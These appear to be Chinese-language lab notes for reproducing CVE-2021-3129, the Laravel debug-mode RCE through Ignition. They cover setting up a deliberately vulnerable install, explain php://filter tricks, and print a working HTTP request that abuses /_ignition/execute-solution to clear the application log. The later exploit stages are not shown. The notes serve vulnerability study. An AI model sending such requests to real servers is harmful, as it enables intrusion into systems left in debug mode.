Laravel ＜= v8.4.2 debug mode: Remote code execution

Laravel，会将错误写入到日志里storage/log/laravel.log。
从Laravel 6开始，debug的stack trace由Ignition生成。

步骤：

$ git clone https://github.com/laravel/laravel.git
$ cd laravel
$ git checkout e849812
$ composer install
$ composer require facade/ignition==2.5.1
$ cp ./.env.example ./.env    # .env文件必须这里设置了`APP_DEBUG=true`
$ php artisan serve

安装composer：

curl -sS https://getcomposer.org/installer -o composer-setup.php
sudo php composer-setup.php --install-dir=/usr/local/bin --filename=composer

安装php7.3：
参考：https://computingforgeeks.com/how-to-install-php-7-3-on-ubuntu-18-04-ubuntu-16-04-debian/

sudo apt install software-properties-common
sudo add-apt-repository ppa:ondrej/php
sudo apt install php7.3
sudo apt install php7.3-cli php7.3-fpm php7.3-json php7.3-pdo php7.3-mysql php7.3-zip php7.3-gd  php7.3-mbstring php7.3-curl php7.3-xml php7.3-bcmath php7.3-json

php7.3安装完成之后，替换默认的php命令为php7.3
给php7.3添加mbstring模块功能：

sudo phpenmod -v 7.3 mbstring

laravel

利用php://filter/这个协议。

• php://filter/convert.base64-decode/resource=/tmp/file1 对文件内容进行base64解码
• php://filter/read=convert.iconv.utf16le.utf-8/resource=/tmp/test.txt 将某些字符串转换成非ASCII码

参考：

• https://tecadmin.net/enable-disable-php-modules-ubuntu/

情况larvavel的log

POST /_ignition/execute-solution HTTP/1.1
Host: cqq.com:8000
Connection: close
Content-Type: application/json
Content-Length: 275

{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "username", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}

参考

• 漏洞分析 | Laravel Debug页面RCE（CVE-2021-3129）分析复现
• https://www.mrkaixin.top/posts/2df9bfb7/